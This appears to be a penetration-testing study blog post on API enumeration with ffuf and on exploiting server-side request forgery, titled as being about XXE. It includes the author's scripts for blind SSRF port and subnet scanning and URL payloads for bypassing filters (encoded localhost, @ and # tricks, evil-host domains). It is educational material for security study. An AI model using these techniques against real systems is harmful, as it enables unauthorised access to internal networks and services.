XXE Injections
Abusing XML Parsers
API’s generally fall into the following categories.
Before we try to identify the type of API we are dealing with we will have to perform a general scan of the web application.
Out of all the bruteforcing tools I like ffuf the most because it provides the most coverage in terms of features.
General scan:
ffuf -c -w /path/to/wordlist -u http://<ip-address>/FUZZ
Matching Specific Responses:
ffuf -c -w /path/to/wordlist -u http://<ip-address>/FUZZ -mc 200,404
Virtuals Hosts/Subdomains:
This type of scan returns a lot of false positives, so we often want to filter by an attribute of the response, like the number of bytes a response is, for example.
ffuf -c -w /path/to/wordlist -u http://host/ -H "Host: FUZZ.host"
The first step is to uncover as much of the API as possible.
When enumerating API’s we be looking for a couple things:
Parameter Mining:
ffuf -c -w /path/to/wordlist -u http://example.com/data?FUZZ=1
Recursive Parameter Mining:
ffuf -c -u http://example.com/api/v1/W1?=W2 -w ./methodlist:/path/to/method/list:W1,/path/to/param/list:W2 -mc 200,301
Since we know that RESTful APIs often follow a pattern of:
We should also understand the behavior of each API endpoint when requests are made with different HTTP verbs.
We can perform this enumeration using ffuf, since ffuf allows us to specify the HTTP verb via the -X switch
ffuf -c -u http://apigateway:8000/OBJECT/ACTION -w /path/to/wordlist:OBJECT,/path/to/action/list:ACTION -mc 200,403,404 -X GET
ffuf -c -u http://apigateway:8000/OBJECT/IDENTIFIER -w /path/to/wordlist:OBJECT,/path/to/action/list:IDENTIFIER -mc 200,403,404 -X GET
Ffuf is indeed great but in this instance it’s lacking for a couple reasons.
Invoke-RouteBuster.ps1 is a script I made while studying for the OSWE certification.
I made it to address the problems mentioned above with ffuf.
The full script can be found here.
Example usage:
Invoke-RouteBuster -ActionList ./actions-only-valid.txt -Wordlist ./wordlist-only-valid.txt -Target http://apigateway:8000 -Methods get,post,put -Verbosity v | ft
Example output:
URI GET POST PUT
--- --- ---- ---
http://apigateway:8000/files/import 403 400 404
http://apigateway:8000/users/frame 200 404 404
http://apigateway:8000/users/home 200 404 404
http://apigateway:8000/users/invite 403 400 404
http://apigateway:8000/users/readme 200 404 404
http://apigateway:8000/users/welco… 200 404 404
http://apigateway:8000/users/wellc… 200 404 404
Blind SSRF occurs when we can make a web application send an HTTP request to a supplied URL, but the application does not return the response made by the back end (e.g., the one we provided) to the front end.
Thus there is no way of knowing if the request was successful.
Right?
Wrong!
By issuing a request to a resource that we know is valid either to ourselves or a valid IP in the backend and then issuing a request to a URL we know is invalid, we can get a sense of whether the URL is valid or not.
Testing for blind SSRF is not much different from time-based blind SQLI.
Invoke-SSRFPortScan -Target http://apigateway:8000/files/import -SSRF http://localhost -Open
Output:
Target StatusCode Content
------ ---------- -------
http://localhost:8055 403 {"errors":[{"message":"You don't have permission to access this.","extensions":{"code":"FORBIDDEN"}}]}
I’ve found the most important thing is to have a mental model of possible network configurations. The easiest way to generate this data is via CIDR.
When Subnet scanning with SSRF, we should also check for other hosts within the network.
There are two ways we can scan an internal network through SSRF.
IP ADDR RANGE | NUMBER OF ADDRESSES |
---|---|
10.0.0.0/8 | 224 = 16,777,216 |
172.16.0.0/12 | 220 = 1,048,576 |
192.168.0.0/16 | 216 = 65,536 |
Scanning through any IP ranges above would take several days, so what we can do is scan for network gateways.
Where there is a live gateway, there are often live hosts.
Network designs commonly use a /16 or /24 subnet mask with the gateway running on the IP where the forth octet is “.1” e.g 192.168.1.1/24 or 172.16.0.1/16.
It’s also important to keep in mind that gateways can live on any IP address, and subnets can be any size, so at least in a black box scenario, we should assume a network design of /16 or /24 and use this as a starting place and widen the search space as necessary.
When subnet scanning, we should keep in mind our goal is. When we want to determine whether or not a particular address has something of interest, then any of the following means that we are dealing with a live host.
The script I use to scan subnets via SSRF is here.
Scan a subnet in specified CIDR notation for live gateways.
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -NetworkAddress '172.16.16.1/31' -Gateway -Ports 80
Scan a list of IP’s in CIDR notation for live hosts.
Here “-Open” means any IP that does not return EHOSTUNREACH (e.g, no route found to the target ip).
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -NetworkAddress '172.16.16.2/32' -Hosts -Open
Attempt Hostname resolution via DNS.
Here “-Open” means any host that does not return EAI_AGAIN (e.g, DNS lookup failure).
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -Hostnames ./hostnames.txt -Open
Depending on the CORS policy, it may be possible to use javascript to turn a blind SSRF vulnerability into a normal one.
Internal networks are trusted environments so a relaxed CORS policy is to be expected so we could attempt to exfiltrate data via html and javascript payloads.
If Access-Control-Allow-Credentials are present even better.
Filter SSRF defenses can come in the form of:
Blacklist filters are notoriously insecure because they can often be fooled with alternate encodings (e.g., representations) of different types of data.
For instance localhost can be written as:
127.0.0.1
An integer representation of the string “127.0.0.1”
2130706433
127.0.0.1 in Octal notation
017700000001
This is a trick that can be used because of how the inet_aton function is implemented.
127.1
In addition to the methods above we can also:
When applications only allow input that matches specific values, we have to attempt to exploit the inconsistencies in how the application developers have chosen to parse URLs.
This is possible because the URL specification contains many features that are liable to be overlooked when developers implement parsing and validation of URLs.
So, we are relying on the developer(s) making mistakes, lol.
We can embed credentials in a URL before the hostname, using the @ character.
For example:
https://expected-host@evil-host
We can use the # character to indicate a URL fragment.
For example:
https://evil-host#expected-host
It’s also important to remember to vary the payload.
e.g., when URL encoded, the # character becomes:
%23
and %23 URL encoded again becomes:
%2523
We can even combine the two, e.g:
https://evil-host%2523@expected-host
URL encoding is likely to be successful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
It’s also something to keep an eye out for when doing white-box assessments.
We can use the DNS naming hierarchy to place required input into a fully-qualified domain name that we control. For example:
https://expected-host.evil-host
Another method we have to bypass SSRF input filters is to (ab)use the application’s logic. Sometimes web applications list data in series. This could be:
When we look at the response, we might see a parameter that indicates the location of the previous, next, or related data.
On the Websecurity Academy, they use an example of products in a stocking-related API.
Assuming a legitimate request like the one below,
POST /product/stock
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
It’s worth it to check if we can (ab)use the path parameter to:
What’s important here is that we basically validate redirect behavior and then use the valid url containing the redirection on the request we think there is a filter on. I.E they may not be the same requests.
I think most important thing to understand about this type of vulnerability is that first of all, it depends on the application’s logic validating the stockApi parameter but not the path parameter.
The other arguably more crucial insight is that from a black box perspective we should be asking ourselves which have the developer(s) implemented validation on.
What’s important here is that we validate the redirect behavior by using a valid URL on the request on which we think there is a filter.
I.E, they may be different requests.
The most important thing to understand about this type of vulnerability is that it depends on the application’s logic validating the stockApi parameter but not the path parameter.
The other broader and arguably more crucial insight is that from a black box perspective, we should ask ourselves where the developer(s) implemented validation.
Sometimes, an application places only a hostname or part of a URL path into request parameters.
The value submitted is then incorporated server-side into a full URL that is requested.
The potential attack surface might be obvious if the value is readily recognized as a hostname or URL path. However, exploitability as full SSRF might be limited since you only control some of the URL that gets requested.websecurity academy
XXE is also a format we can use to abuse SSRF.
Some applications employ server-side analytics software that tracks visitors.
This software often logs the Referer header in requests since this is of particular interest for tracking incoming links.
Often the analytics software will actually visit any third-party URL that appears in the Referer header.
This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links.
As a result, the Referer header often represents a fruitful attack surface for SSRF vulnerabilities.websecurity academy
Server Side Request Forgery (SSRF) and Microservice Architecture go hand in hand because modern Web Applications are built as Microservices. For example, the customer viewing an eCommerce application sees one website, but it is composed of N services running in containers (e.g., Docker).
API Gateways and Reverse Proxies provide an access control layer to the APIs implementing the Microservices. Consequently, bypassing the API Gateway/Reverse Proxy means avoiding the main security controls of the web application.
If the Microservices are in a flat network(meaning the Microservices can talk to each other without going through any intermediary hardware devices, such as a bridge or router), we could use an SSRF vulnerability to make one microservice talk directly to another microservice. Any controls enforced by the API Gateway/Reverse Proxy would not apply to the traffic between two or more Microservices, allowing an SSRF exploit to gather information about the internal network and open new attack vectors on that network.
This is possible because internal networks are usually considered trusted environments.
The impact of an SSRF vulnerability depends on what data it can access and whether the SSRF returns any resulting data to the attacker.
SSRF vulnerabilities can be especially effective against Microservices because Microservices will often have fewer security controls in place if they rely upon an API Gateway/Reverse Proxy to implement those controls.